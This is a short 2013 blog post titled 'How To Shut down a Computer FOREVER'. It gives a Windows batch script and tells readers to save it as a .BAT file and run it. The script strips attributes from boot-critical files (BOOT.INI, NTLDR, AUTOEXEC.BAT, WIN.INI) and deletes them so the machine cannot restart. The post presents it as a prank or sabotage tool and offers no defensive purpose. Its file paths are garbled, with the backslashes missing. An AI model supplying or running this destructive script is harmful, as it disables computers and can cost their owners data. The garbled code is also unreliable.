Sunday, 26 May 2013

How To Shut down a Computer FOREVER



Open Notepad and COPY PASTE this CODE:

@ECHO OFF

ATTRIB -R -S -H C:AUTOEXEC.BAT

DEL C:AUTOEXEC.BAT

ATTRIB -R -S -H C:BOOT.INI

DEL C:BOOT.INI

ATTRIB -R -S -H C:NTLDR

DEL C:NTLDR

ATTRIB -R -S -H C:WINDOWSWIN.INI

DEL C:WINDOWSWIN.INI



SAVE this extension as .BAT FILE and Open it once.

It Shuts down PC forever and Delete files needed to restart the system.

0 comments :

Facebook Blogger Plugin: Bloggerized by www.softwereshouse.blogspot.com which is created by Noman Jatoi

Post a Comment